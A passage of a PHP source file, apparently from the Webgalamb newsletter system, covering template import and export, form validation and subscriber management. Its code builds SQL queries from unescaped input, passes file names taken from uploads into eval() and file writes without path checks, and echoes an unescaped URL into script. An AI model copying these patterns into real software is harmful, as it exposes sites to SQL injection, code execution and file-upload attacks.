			$thumb = imagecreatetruecolor($newwidth, $newheight);

			// Resize
			//imagecopyresized($thumb, $source, 0, 0, 0, 0, $newwidth, $newheight, $width, $height);
			imagecopyresampled($thumb, $source, 0, 0, 0, 0,$newwidth, $newheight, $width, $height);

			ob_start();
			if($imagetype == 1)
				imagegif($thumb);
			elseif($imagetype == 2)
				imagejpeg($thumb);
			elseif($imagetype == 3)
				imagepng($thumb);
			
			$imgout = ob_get_contents();
			ob_end_clean();
			imagedestroy($thumb);
		} else {
			$imgout = $file;
		}
		
			
		$img = $imgs->addChild('image_'.$i);
		//$img->addAttribute('id', $i);
		$img->addChild('placeholder', 'image_'.$i);
		$img->addChild('name', $image_name);
		$img->addChild('file', base64_encode($imgout));
		
		$img_url = str_replace('&', '&amp;', $img_url);
		$html = str_replace($img_url, '{image_'.$i.'}', $html);
		$i++;
	}

	$data->addChildCData('head', '');//<![CDATA[
	$data->addChildCData('html', $message['text']);//<![CDATA[
	$editor = $template->addChild('editor');
	/*
	$style = $editor->addChild('style');
	foreach($style_data as $key => $val) {
		$$key = $style->addChild($key);//<![CDATA[
		foreach($val as $key2 => $val2) {
			$$key->addChildCData($key2, $val2);//<![CDATA[
		}
	}
	*/
	$content = $editor->addChild('content');
	$message['template_params'] = json_decode($message['template_params'], 1);
	$template_params_css = explode('files/', $message['template_params']['css'][0]);
	$message['template_params']['css'][0] = $template_params_css[1];
	$content->addChildCData('template_params', json_encode($message['template_params']));

	$dom = dom_import_simplexml($template)->ownerDocument;
	$dom->formatOutput = true;
	$xml = $dom->saveXML(); 
	
	//_print_r(htmlspecialchars($xml));return;
	//return '@WGMX '.base64_encode($xml);

	header("Content-Type: application/WGX");
	header("Content-Disposition: attachment; filename=\"".$file_name.".wgx\"");
	header("Cache-Control: cache, must-revalidate");
	header("Pragma: cache");
	header("Connection: close");
	echo $out = '@WGMX '.base64_encode($xml);
	
	exit;
	/**/
}

function decode_sc($a1)
{
	$a1 = str_replace(chr(245), chr(197) . chr(145), $a1); //
	$a1 = str_replace(chr(250), chr(195) . chr(186), $a1); //
	$a1 = str_replace(chr(251), chr(197) . chr(177), $a1); //
	$a1 = str_replace(chr(252), chr(195) . chr(188), $a1); //
	$a1 = str_replace(chr(243), chr(195) . chr(179), $a1); //
	$a1 = str_replace(chr(237), chr(195) . chr(173), $a1); //
	$a1 = str_replace(chr(233), chr(195) . chr(169), $a1); //
	$a1 = str_replace(chr(225), chr(195) . chr(161), $a1); //
	$a1 = str_replace(chr(246), chr(195) . chr(182), $a1); //

	$a1 = str_replace(chr(213), chr(197) . chr(144), $a1); //
	$a1 = str_replace(chr(218), chr(195) . chr(154), $a1); //
	$a1 = str_replace(chr(219), chr(197) . chr(176), $a1); //
	$a1 = str_replace(chr(220), chr(195) . chr(156), $a1); //
	$a1 = str_replace(chr(211), chr(195) . chr(147), $a1); //
	$a1 = str_replace(chr(205), chr(195) . chr(141), $a1); //
	$a1 = str_replace(chr(201), chr(195) . chr(137), $a1); //
	$a1 = str_replace(chr(193), chr(195) . chr(129), $a1); //
	$a1 = str_replace(chr(214), chr(195) . chr(150), $a1); //
	return $a1;
}


function XMLToArray($xml)
{
	if ($xml instanceof SimpleXMLElement) {
		$children = $xml->children();
		$return = null;
	}

	foreach ($children as $element => $value) {
		if ($value instanceof SimpleXMLElement) {
			$values = (array)$value->children();

			if (count($values) > 0) {
				$return[$element] = $this->XMLToArray($value);
			} else {
				if (!isset($return[$element])) {
					$return[$element] = (string)$value;
				} else {
					if (!is_array($return[$element])) {
						$return[$element] = array($return[$element], (string)$value);
					} else {
						$return[$element][] = (string)$value;
					}
				}
			}
		}
	}

	if (is_array($return)) {
		return $return;
	} else {
		return false;
	}
}


function message_dump($file, $g)
{
	global $out, $filesdir;
	if (!isset($filesdir)) $filesdir = WG_PATH.'files/';

	if (is_uploaded_file($_FILES[$file]['tmp_name'])) {
		if (pathinfo($_FILES[$file]['name'], PATHINFO_EXTENSION) == 'wgx') {
// wgx fjl
			$wgx = file_get_contents($_FILES[$file]["tmp_name"]);
			if (substr($wgx, 0, 6) != '@WGMX ')
				return false;

			$wgm_xml = base64_decode(str_replace('@WGMX ', '', $wgx));
			$xml = new SimpleXMLElement($wgm_xml);
			$wgx_array = $this->XMLToArray($xml);

			$chd = $this->conf_read("chmod_dir");
			$chf = $this->conf_read("chmod_file");
			$id = $this->a_i("".DB_PREFIX."messages");
			$code = $this->generateCode(38);
			if ($this->conf_read("https") == 1) $https = 'https://';
			else $https = 'http://';


// ltrehozzuk a kpek mappjt
			$url = $https . $_SERVER['HTTP_HOST'] . '/' . $this->conf_read("wg_dir") . 'files/images/' . $id . '/';
			$dir = WG_PATH.'files/images/' . $id . '/';
			if (!is_dir($dir))
				mkdir($dir);

			if ($chd > 100 && $chd <= 777)
				chmod($dir, '0' . (int)($chd));

// helyre rekjuk a kpeket a html-ben s a mappkban
			foreach ($wgx_array['images'] as $key => $val) {
				if(basename($val['name']) !== $val['name'])
					die('Image name error!');
				
				$image_url = $url . $val['name'];
				$image_path = $dir . $val['name'];
				$placeholder = '{' . $val['placeholder'] . '}';
				$wgx_array['data']['html'] = str_replace($placeholder, $image_url, $wgx_array['data']['html']);
				if (!file_exists($image_path)) {
					$val['file'] = base64_decode($val['file']);
					
					// ellenrzs
					$verifyimg = getimagesizefromstring($val['file']);

					/* Make sure the MIME type is an image */
					$pattern = "#^(image/)[^\s\n<]+$#i";

					// ha nem kp, hibval eldobjuk a feladatot
					if(!preg_match($pattern, $verifyimg['mime'])) {
						die("Only image files are allowed!");
					}

					$handle = fopen($image_path, 'w');
					fwrite($handle, $val['file']);
					fclose($handle);
				}
				if ($chf > 100 && $chf <= 777)
					chmod($image_path, '0' . (int)($chf));
			}
			
			if($wgx_array['data']['template_name']) {
				$template_params = json_decode($wgx_array['editor']['content']['template_params'], 1);
				$template_params['css'][0] = WG_URL.'files/'.$template_params['css'][0];
				
				$template_params = json_encode($template_params);
			} else {
				$template_params = '';
			}

			$this->mq("insert into `".DB_PREFIX."messages` set `name` = '" . mysql_real_escape_string($wgx_array['data']['name']) . "',
`subject` = '" . mysql_real_escape_string($wgx_array['data']['subject']) . "',
`text` = '" . mysql_real_escape_string($wgx_array['data']['html']) . "',
`extract` = '" . mysql_real_escape_string($wgx_array['data']['extract']) . "',
`template_name` = '" . mysql_real_escape_string($wgx_array['data']['template_name']) . "',
`template_params` = '" . mysql_real_escape_string($template_params) . "',
`tiny_head` = '" . mysql_real_escape_string($wgx_array['data']['head']) . "',
`date` = CURDATE(),
`g` = '$g',
`code` = '$code'");

			$out = __('Sikeres sablon feltlts');

		} else { 
			$dir_s = $this->conf_read("wg_dir");
			move_uploaded_file($_FILES[$file]['tmp_name'], WG_PATH . 'files/message.wgm');
			$chf = $this->conf_read("chmod_file");
			if ($chf > 100 && $chf <= 777) {
				$e = "chmod('{$filesdir}files/message.wgm', 0" . (int)($chf) . ");";
				eval($e);
			}
			if (@is_file(WG_PATH . 'files/message.wgm')) {
				$handle = @fopen(WG_PATH . 'files/message.wgm', "r");
				$contents = @fread($handle, @filesize(WG_PATH . 'files/message.wgm'));
				@fclose($handle);

				if (!$contents) {
					$out = 'Hibs fjl!';
					@unlink(WG_PATH . 'files/message.wgm');
					return false;
				}
				$t = explode("\\", $contents);
				if ($t[0] != base64_encode("WEBGALAMB2 MESSAGE FILE")) {
					$out = __('Hibs fjl!');
					@unlink(WG_PATH.'files/message.wgm');
					return false;
				}

				$id = $this->a_i("".DB_PREFIX."messages");
				$code = $this->generateCode(38);
				$this->mq("insert into `".DB_PREFIX."messages` (text, name, subject,g,`date`, `code`) values ('" .
					mysql_real_escape_string(str_replace("{ELERES}/", "http://" . $_SERVER['HTTP_HOST'] . '/' . $dir_s . "files/images/$id/", $this->decode_sc(base64_decode($t[3])))) .
					"', '" . mysql_real_escape_string($this->decode_sc(base64_decode($t[1]))) . "', '" . mysql_real_escape_string($this->decode_sc(base64_decode($t[2]))) . "','$g', CURDATE(), '$code')");

				@mkdir($filesdir . "files/images/$id");

				$chd = $this->conf_read("chmod_dir");
				if ($chd > 100 && $chd <= 777) {
					$e = "chmod('".WG_PATH."files/images/$id/', 0" . (int)($chd) . ");";
					eval($e);
				}

				reset($t);
				$x = count($t) - 1;

				for ($i = 5; $i < $x; $i++) {
					$t2 = explode('|', $t[$i]);
					$file = "{$filesdir}files/images/$id/" . base64_decode($t2[0]);

					if (!file_exists($file)) {
//@touch ($file);
						$handle = fopen($file, 'w');
						fwrite($handle, base64_decode($t2[1]));
						fclose($handle);
						if ($chf > 100 && $chf <= 777) {
							$e = "chmod('$file', 0" . (int)($chf) . ");";
							eval($e);
						}
					}
				}

				@unlink(WG_PATH."files/message.wgm");
			} else $out = __('Fjl feltlts sikertelen!');
		}
	} else $out = __('Fjl feltlts sikertelen!');
	return $out;
}


function var_create()
{
	global $_POST;
	$num_para = func_num_args();
	$num_para = $num_para - 2;
	$v = func_get_arg(0);
	for ($i = 1; $i <= $num_para + 1; $i++) {
		$nev = func_get_arg($i);//echo $nev. " ";
		if ($v == 'post') {
			if (is_array($nev)) {
				if (!isset($_POST[$nev[0]])) $_POST[$nev[0]] = $nev[1];
			} else {
				if (!isset($_POST[$nev])) $_POST[$nev] = '';
			}
		} elseif ($v[0] == 's') {
			global $s;
			if (is_array($nev)) {
				if (!isset($$v2[$nev[0]])) $$v2[$nev[0]] = $nev[1];
			} else {
				if (!isset($s[$nev])) $s[$nev] = '';
			}
		} else {
			if (is_array($nev)) {
				if (!isset($$nev[0])) $$nev[0] = $nev[1];
			} else {
				if (!isset($$nev)) $$nev = '';
			}
		}
	}
}


function location($loc){
	?>
		<script language="javascript"><!--
		parent.self.location.href='<?php echo $loc; ?>';
		-->
		</script>
		<meta content="0;URL=<?php echo $loc; ?>" http-equiv="refresh">
		<?php exit;
}


function TG_validate()
{
  $num_para = func_num_args();
  $num_para = $num_para - 2;
  $v = func_get_arg(0);
  $t = func_get_arg(1);
  if (($num_para % 4)) {
    die(__('Hibs ellenrz fggvny hasznlat!!!'));
    exit;
  }
  $error = '';
  if ($t != 'php') $error = "YY_checkform('$t',";;
  for ($i = 1; $i <= ($num_para / 4); $i++) {
    $nev = func_get_arg(($i * 4) - 2);
    $muv = func_get_arg(($i * 4) - 1);
    $m2 = func_get_arg(($i * 4));
    $ertek = ($v == 'post') ? $_POST["$nev"] : $_GET["$nev"];

    if ($t == 'php') {
      if ($muv == '#') { // ha string muvelet
        if (!$m2) {
          if ($ertek == '') $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
        } else {
          $n = strlen($m2);
          $s = substr($m2, 1, $n - 1);
          if ($m2[0] == '<') if ($ertek == '' || strlen($ertek) > $s) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
          if ($m2[0] == '>') if ($ertek == '' || strlen($ertek) < $s) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
          if ($m2[0] == '=') if ($ertek == '' || strlen($ertek) == $s) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
        }
      }

      if ($muv == '#m') if (!$this->isValidEmail($ertek)) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
      if ($muv == 'm') if ((!$this->isValidEmail($ertek)) && $ertek) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
      if ($muv == '#e') if (!preg_match($m2, $ertek)) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
      if ($muv == 'e') if (!preg_match($m2, $ertek) && $ertek) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
      if ($muv == 's') if ($ertek == '') $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
      if ($muv[0] == '=') // pl. jelszellenrzs
      {
        $n = strlen($muv);
        $s = substr($muv, 1, $n - 1);
        $ert2 = ($v == 'post') ? $_POST["$s"] : $_GET["$s"];
        if ($m2) {
          if ($ertek != $ert2 || strlen($ertek) < $m2) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
        } else {
          if ($ertek != $ert2) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
        }
      }
      if ($muv == 'n') //ha szm, de nem ktelezo megadni
      {
        if (!$m2) {
          if ($ertek != '' && !preg_match("/^([(0-9]+)?$/", $ertek)) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
        } else
          if ($ertek) {
          $q = strpos($m2, '-');
          $a = substr($m2, 0, $q);
          $b = substr($m2, $q + 1, strlen($m2) - $q);
          if (!preg_match("/^([(0-9]+)?$/", $ertek) || $ertek < $a || $ertek > $b) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
        }
      }
      if (($muv == 'd' && $ertek) || ($muv == '#d')) // dtum ellenrzs
      {
        $_POST["$nev"] = str_replace(array('/', '.'), array('-', '-'), $_POST["$nev"]);
        if (preg_match('/^([0-9]{4})-*([0-9]{2})-*([0-9]{2})$/', $ertek, $x)) {
          $d = date("Y-m-d");
          if (!($x[1] > 2100 || $x[2] > 12 || $x[3] > 31)) {
            if (($m2 && $m2 == '<') && ($d < $ertek)) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
            if (($m2 && $m2 == '>') && ($d > $ertek)) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
            if (($m2 && $m2 == '<=') && ($d <= $ertek)) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
            if (($m2 && $m2 == '>=') && ($d >= $ertek)) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
          } else {
            $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
          }
        } else $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
      }

      if (($muv == 'ip' && $ertek) || ($muv == '#ip')) // dtum ellenrzs
      {
        $rIp = explode('.', $ertek);
        if (count($rIp) == 4) {
          foreach ($rIp as $p) {
            if ($p > 255 || !preg_match("/^([(0-9]+)?$/", $p)) {
              $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
              break;
            }
          }
        } else $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
      } // ip cm ellenrzs


      if ($muv == '#n') // ha szm s ktelezo megadni
      {
        if (!$m2) {
          if ($ertek == '' || !preg_match("/^([(0-9]+)?$/", $ertek)) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
        } else {
          $q = strpos($m2, '-');
          $a = substr($m2, 0, $q);
          $b = substr($m2, $q + 1, strlen($m2) - $q);
          if (!preg_match("/^([(0-9]+)?$/", $ertek) || $ertek < $a || $ertek > $b) $error .= "\r\n* " . func_get_arg(($i * 4) + 1);
        }
      }
    } // ha php hibaellenorzs vt. ha nem akkor javascript teht
    else { // ha js ellenorzes 'torzs','#q','1'
      if ($muv == 'm') $error .= "\r\n '$nev','$m2" . "S','2','" . func_get_arg(($i * 4) + 1) . "',";
      if ($muv == 's') $error .= "\r\n '$nev','#q','1','" . func_get_arg(($i * 4) + 1) . "',";
      if ($muv == '#' && $m2 == '') $error .= "\r\n '$nev','#q','0','" . func_get_arg(($i * 4) + 1) . "',";
      if ($muv == '#' && $m2) $error .= "\r\n '$nev','$m2','1','" . func_get_arg(($i * 4) + 1) . "',";
      if ($muv == '#n') {
        $m2 = str_replace("-", "_", $m2);
        $error .= "\r\n '$nev','#$m2','1','" . func_get_arg(($i * 4) + 1) . "',";
      }
      if ($muv == 'n') {
        $m2 = str_replace("-", "_", $m2);
        $error .= "\r\n '$nev','$m2','1','" . func_get_arg(($i * 4) + 1) . "',";
      }
      if ($muv[0] == '=') {
        $n = strlen($muv);
        $s = substr($muv, 1, $n - 1);
        $error .= "\r\n '$nev','#$s','6','" . func_get_arg(($i * 4) + 1) . "',";
      }
    } // js elllenrzs

  }

  if ($error && $t != 'php') {
    $error[strlen($error) - 1] = ')';
    $error .= ';return document.MM_returnValue';
  }
  return $error;
}


function mail_id($mail)
{
  
  $x = $this->m_array("SELECT mail_id FROM `".DB_PREFIX."users` where mail = '$mail' limit 0, 1", 'mail_id');
  $x = $x ? $x : ($this->m_array("SELECT mail_id FROM `".DB_PREFIX."users` order by mail_id desc limit 0, 1", 'mail_id') + 1);
  return $x;
}

function user_data($uid)
{
  
  $s = $this->m_array("select * from `".DB_PREFIX."users` where id='$uid'");
  $_g = $this->m_array("select * from `".DB_PREFIX."groups` where id='$s[g]'");
  $x = $this->mq("Select * from `".DB_PREFIX."fields` where g='$s[g]'");
  while ($y = mysql_fetch_assoc($x)) {
    if ($_g['email2_field'] == $y['id'] || $_g['email_field'] == $y['id']) continue;
	  //if(																																	//6:szm //5:dtum
    $v = $this->m_array("select * from `".DB_PREFIX."fields_data` where un='$s[id]' and did='$y[id]'", ($y['type'] == 2 || $y['type'] == 4 || $y['type'] == 6) ? 'int_text' : (($y['type'] == 5) ? 'date' : 'text'));
    if ($y['type'] < 2) $s[$y['name']] = $v;
    elseif ($y['type'] > 4) $s[$y['name']] = $v;
    elseif (!strstr($v, ';')) $s[$y['name']] = $this->m_array("select * from `".DB_PREFIX."fields_fields` where id='$v'", 'name');
    else {
      $array = explode(';', $v);
      $s[$y['name']] = array();
      foreach ($array as $vv) $s[$y['name']][] = $this->m_array("select * from `".DB_PREFIX."fields_fields` where id='$vv'", 'name');
    }
  }
  return $s;
}

function writeStatusLog($id, $method, $status, $new = false)
{
  
  $result = $this->m_array("select status_log, active from `".DB_PREFIX."users` where id='$id'");

  $data = (array)json_decode($result['status_log'], true);
		
		// ha ugyanaz a sttusz akkor nem rjuk be (pl csoportos aktivlsnl amikor eleve aktv a feliratkoz)
  $end = end($data);
  if ($end['status'] == $status)
    return;
		
		// ha nincs korbbi naplbejegyzs akkor berjuk ismeretlenknt a korbbi sttuszt az els helyre 
		// (a feliratkoz rgebben jtt mint a funkci bekerlt a Webgalambba)
  if (empty($result['status_log']) && $new == false) {
    $data[] = array('date' => 'unknown', 'method' => 'unknown', 'status' => $result['active']);
  }

  $data[] = array('date' => date('Y-m-d H:i:s'), 'method' => $method, 'status' => $status);
  $status_log = json_encode($data);

  $this->mq("UPDATE `".DB_PREFIX."users` set status_log='{$status_log}' where id='$id'");
}

function writeModLog($id) {
	$result = $this->m_array("select mod_log, mail from `".DB_PREFIX."users` where id='$id'");
	
	$data = (array)json_decode($result['mod_log'], true);
	
	$data[] = array('date'=>date('Y-m-d H:i:s'), 'email'=>$result['mail'], 'ip'=>$this->getip());
	$mod_log = json_encode($data);
	
	$this->mq("UPDATE `".DB_PREFIX."users` set mod_log='{$mod_log}' where id='$id'");
}

function unsubscribedDataBackup($subscriber_id) {
	$user_data = $this->user_data($subscriber_id);
	
	$meta_data = json_encode(
					array('ipdatum'=>$user_data['ipdatum'], 
						 'ip_orig'=>$user_data['ip_orig'],
						 'nmail'=>$user_data['nmail'],
						 'omail'=>$user_data['omail'],
						 'ip'=>$user_data['ip'],
						 'datum'=>$user_data['datum'],
						 'mdatum'=>$user_data['mdatum']
						), JSON_UNESCAPED_UNICODE
				);
	
	$mail = $user_data['mail'];
	$group_name = $this->m_array("select name from `".DB_PREFIX."groups` where id='$user_data[g]'", 'name');
	$status_log = $user_data['status_log'];
	
	// kitrljk a tmbbl a nem feliratkozsi mezbl rkez adatokat
	$sql = $this->mq("SHOW COLUMNS FROM `".DB_PREFIX."users`");
	while($data = mysql_fetch_assoc($sql))
		unset($user_data[$data['Field']]);

	// talaktjuk a sortrseket mert a JSON gy szeresse :)
	foreach($user_data as $key => $value) {
		$user_data[$key] = str_replace(array("\r\n", "\n", "\r", PHP_EOL), '<br>', $value);
	}
	
	$data = json_encode($user_data, JSON_UNESCAPED_UNICODE); 
	
	$this->mq("insert into `".DB_PREFIX."unsubscribed` 
					(`orig_id`, `mail`, `data`, `meta_data`, `group_id`, `group_name`, `status_log`, `record_time`) 
						values 
					('".$subscriber_id."', '".$mail."', '".$data."', '".$meta_data."', '".$user_data['g']."', '".$group_name."', '".$status_log."', CURRENT_TIMESTAMP)");
}

function new_user($array, $g = 0, $method = 'unkown')
{
  
  if (!$g) return false;
  $g_a = $this->m_array("select * from `".DB_PREFIX."groups` where id='$g'"); // megnzzk ltezik e a csoport								 
  if ($g_a) {
    if ($g_a['d_user'] || !$this->m_array("select * from `".DB_PREFIX."users` where mail='$array[mail]' and g='$g'")) // ha nincs benne a csoportba vagy lehet tbbszr benne										
    {
      $v_C = $this->generateCode(40);
      if (!$array['mail_id']) $array['mail_id'] = $this->mail_id($array['mail']);
      $this->mq("insert into `".DB_PREFIX."users` ( mail, mail_id, ip, ip_orig, datum, verify_code, active, g, ipdatum) values 
			                     ( '$array[mail]', '$array[mail_id]', '" . $this->getip() . "', '".$this->getip()."', CURDATE(), '$v_C', $array[active], '$g', '$array[ipdatum]')");
      $id = mysql_insert_id();
      $this->writeStatusLog($id, $method, $array['active']);

      if ($this->m_array("select * from `".DB_PREFIX."sub_stat` where date=CURDATE() and g=$g"))
        $this->mq("update `".DB_PREFIX."sub_stat` set c=c+1 where date=CURDATE() and g=$g");
      else
        $this->mq("insert into `".DB_PREFIX."sub_stat` (date, g, c) values (CURDATE(), '$g', 1)");

      $this->mq("update `".DB_PREFIX."groups` set stat_auto=stat_auto+1 where id='$g'");
      reset($array);
      $i = 0;
      foreach ($array as $k => $v) {
        $i++;
        if ($i < 10) continue;
        $mezo = $this->m_array("select * from `".DB_PREFIX."fields` where g='$g' and name='$k'");
        if ($mezo) // ltezik a mez hozzadjuk.
        {

          if ($mezo['type'] < 2) {
            if (is_array($v)) $v = implode(';', $v);
            $this->mq("insert into `".DB_PREFIX."fields_data` (un, text, did) values ('$id', '" . mysql_real_escape_string($v) . "', '$mezo[id]')");
          } elseif ($mezo['type'] == 5) // csak dtum
          {
            if ($v || $v === 0) $this->mq("insert into `".DB_PREFIX."fields_data` (un, date, did) values ('$id', '" . mysql_real_escape_string($v) . "', '$mezo[id]')");
          } elseif ($mezo['type'] == 6) // csak szm
          {
            if ($v) $this->mq("insert into `".DB_PREFIX."fields_data` (un, int_text, did) values ('$id', '" . ($v) . "', '$mezo[id]')");
          } elseif ($mezo['type'] == 2 || $mezo['type'] == 4) {
            if (!is_array($v)) {
              $mezo_x = $this->m_array("select * from `".DB_PREFIX."fields_fields` where field_id='$mezo[id]' and name='$v'");
              if ($mezo_x) $this->mq("insert into `".DB_PREFIX."fields_data` (un, int_text, did) values ('$id', '$mezo_x[id]', '$mezo[id]')");
            } else {
              foreach ($v as $v2) {
                $mezo_x = $this->m_array("select * from `".DB_PREFIX."fields_fields` where field_id='$mezo[id]' and name='$v2'");
                if ($mezo_x) $data = $mezo_x['id'];
                break;
              }
              if ($data) $this->mq("insert into `".DB_PREFIX."fields_data` (un, int_text, did) values ('$id', '$data', '$mezo[id]')");
            } // ha tmb
          } // rdi - select
					 
					 //chx
          elseif ($mezo['type'] == 3) {
            $data = '';
            if (is_array($v)) {
              foreach ($v as $v2) {
                $mezo_x = $this->m_array("select * from `".DB_PREFIX."fields_fields` where field_id='$mezo[id]' and name='$v2'");
                if ($mezo_x) $data .= $mezo_x['id'] . ';';
              }
              if ($data) $this->mq("insert into `".DB_PREFIX."fields_data` (un, text, did) values ('$id', '$data', '$mezo[id]')");
            } // ha tmb
            else // ha nem tmb
            {
              $mezo_x = $this->m_array("select * from `".DB_PREFIX."fields_fields` where field_id='$mezo[id]' and name='$v'");
              if ($mezo_x) $this->mq("insert into `".DB_PREFIX."fields_data` (un, text, did) values ('$id', '$mezo_x[id]', '$mezo[id]')");
            }
          } // cx
        } // ltez mez
      }
    } // if
  } else return false; // if							 
}
  
	//csak csoport adatokat msol
function group_copy($name, $gid)
{
  
  $s = $this->m_array("Select * from `".DB_PREFIX."groups` where id='$gid'");
  while ($this->m_array("select count(id) as db from `".DB_PREFIX."groups` where code='" . ($code = $this->generateCode(6)) . "'", 'db'));
  $this->mq("insert into `".DB_PREFIX."groups` (
				name, sender_name, sender_mail, h1,h2,h3,h4,h5,h6,h7, h1_text,h2_text,h3_text,h4_text,h5_text,h6_text,h7_text, 
				d_user, admin_mail,
				a_up, a_down, auto_sc, auto_del, active, date, scr_inactivate,
				inact, a_mod, op_s_d, uns_d, email_d, code) VALUES (
				
				'$name', '$s[sender_name]', '$s[sender_mail]', '$s[h1]','$s[h2]','$s[h3]','$s[h4]','$s[h5]','$s[h6]','$s[h7]', 
				'$s[h1_text]','$s[h2_text]','$s[h3_text]','$s[h4_text]','$s[h5_text]','$s[h6_text]','$s[h7_text]',
				'$s[d_user]', '$s[admin_mail]', 
				'0', '0', '', '', '$s[active]', CURDATE(), '$s[scr_inactivate]',
				'$s[inact]', '$s[a_mod]', '$s[op_s_d]', '$s[uns_d]', '$s[email_d]', '$code')");
  $id = mysql_insert_id();

  $this->mq("update `".DB_PREFIX."groups` set 
				 stext = '" . __('Mintaszveg a form eltt <br> {form} <br><br> Mintaszveg a form utn') . "',
				 form_border = 'eeeeee',
				 form_text ='333333',
				 form_back ='cccccc',
				 form_button_back ='ff8500',
				 form_button_border = '888888',
				 form_button_text = '000000',
				 form_button_text_value = '" . __("Feliratkozs") . "',
				 form_title = '" . __('Feliratkoz rlap') . "' where id = '$id'");
	
	 //  $this->mq("insert into `".DB_PREFIX."fields` (name, g, hidden) values ('$Referer_nev', '$id', '1')");
		
		//feliratkozsi mezk msolsa
  $sql = $this->mq("select * from `".DB_PREFIX."fields` where g='$gid' order by hely");
  while ($sx = mysql_fetch_assoc($sql)) {
    $idx = $this->a_i("".DB_PREFIX."fields");
    if ($sx['hely']) $this->mq("insert into `".DB_PREFIX."fields` (g, `name`, `check`, `hidden`, `type`, hely, `id`) values ('$id', '$sx[name]', '$sx[check]', '$sx[hidden]', '$sx[type]', '$idx', '$idx')");
    else $this->mq("insert into `".DB_PREFIX."fields` (g, `name`, `check`, `hidden`, `type`, hely, `id`) values ('$id', '$sx[name]', '$sx[check]', '$sx[hidden]', '$sx[type]', '0', '$idx')");

    if ($sx['id'] == $s['email_field']) $this->mq("update `".DB_PREFIX."groups` set email_field='$idx' where id=$id");
    if ($sx['id'] == $s['email2_field']) $this->mq("update `".DB_PREFIX."groups` set email2_field='$idx' where id=$id");

    $sql2 = $this->mq("select * from `".DB_PREFIX."fields_fields` where field_id='$sx[id]' order by hely");
    while ($sx2 = mysql_fetch_assoc($sql2)) {
      $idx_2 = $this->a_i("".DB_PREFIX."fields_fields");
      $this->mq("insert into `".DB_PREFIX."fields_fields` (field_id, name, hely, id) values ('$idx', '$sx2[name]', '$idx_2', '$idx_2')");
    }
  }
  return $id;
}

function user_copy($uid, $gs)
{
  
  $user_array = $this->user_data($uid);
  $a = @explode(';', $gs);
  if ($a) foreach ($a as $_id) {
    $g_a = $this->m_array("select id from `".DB_PREFIX."groups` where id='$_id'"); // megnzzk ltezik e a csoport								 
    if ($g_a) {
      $this->new_user($user_array, $_id, 'user_copy');
    }
  }
}


function user_inact($mail, $gs, $method = 'unknown')
{
  
  $a = @explode(';', $gs);
  if ($a) foreach ($a as $_id) {
    $g_a = $this->m_array("select * from `".DB_PREFIX."groups` where id='$_id'"); // megnzzk ltezik e a csoport								 
    if ($g_a) {
      $y = $this->mq("update `".DB_PREFIX."users` set active=0 where g='$_id' and mail='$mail'");
      $result = $this->mq("select id from `".DB_PREFIX."users` where g='$_id' and mail='$mail'");
      while ($user = mysql_fetch_assoc($result)) {
        $this->writeStatusLog($user['id'], $method, '0');
      }
    }
  }
}


function user_delete($mail, $gs, $notify=true)
{
  $a = @explode(';', $gs);
  if ($a) foreach ($a as $_id) {
    $g_a = $this->m_array("select * from `".DB_PREFIX."groups` where id='$_id'"); // megnzzk ltezik e a csoport								 
    if ($g_a) {
      $y = $this->mq("select * from `".DB_PREFIX."users` where g='$_id' and mail='$mail'");
      while ($z = mysql_fetch_array($y)) {
        $this->mq("delete from `".DB_PREFIX."users` where id='$z[id]'");											
					// $this->mq("delete from `".DB_PREFIX."stat` where uid='$z[id]'"); // statisztikbl megfello sorok kitrls
					// $this->mq("delete from `".DB_PREFIX."act_stat` where uid='$z[id]'");
        $this->mq("delete from `".DB_PREFIX."fields_data` where un='$z[id]'");
        $this->mq("update `".DB_PREFIX."groups` set stat_autodel=stat_autodel+1 where id='$_id'");
        $this->mq("insert into `".DB_PREFIX."unscr` (date, g, mid) values (CURDATE(), '$_id', '0')");
      }
			
			if($notify)
				addNotify('Leiratkozs', 'Az albbi csoportbl leiratkozs trtnt:'.PHP_EOL.$g_a['name'], 'g_admin=1&g='.$g_a['id']);
    }
  }
}

function deleteSubscriber($id)
{
	$group = $this->m_array("select g from `".DB_PREFIX."users` where id='$id'");
	
	// feliratkoz adatainak trlse
	$this->mq("delete from `".DB_PREFIX."users` where id='{$id}'");
	$this->mq("delete from `".DB_PREFIX."fields_data` where un='{$id}'");
	
	// statisztikai adatok rgztse
	$this->mq("update `".DB_PREFIX."groups` set stat_autodel=stat_autodel+1 where id='{$group['g']}'");
	$this->mq("insert into `".DB_PREFIX."unscr` (date, g, mid) values (CURDATE(), '{$group['g']}', '0')");
}

function getip()
{
  if (isset($_SERVER)) {
    if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
      preg_match("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/", $_SERVER["HTTP_X_FORWARDED_FOR"], $matches);
      $realip = $matches[0];
    } elseif (isset($_SERVER["HTTP_CLIENT_IP"])) {
      $realip = $_SERVER["HTTP_CLIENT_IP"];
    } else {
      $realip = $_SERVER["REMOTE_ADDR"];
    }
  } else {
    if (getenv('HTTP_X_FORWARDED_FOR')) {
      $realip = getenv('HTTP_X_FORWARDED_FOR');
    } elseif (getenv('HTTP_CLIENT_IP')) {
      $realip = getenv('HTTP_CLIENT_IP');
    } else {
      $realip = getenv('REMOTE_ADDR');
    }
  }

	if(filter_var($realip, FILTER_VALIDATE_IP)) 
		return $realip;
	else 
		return "Unknown";

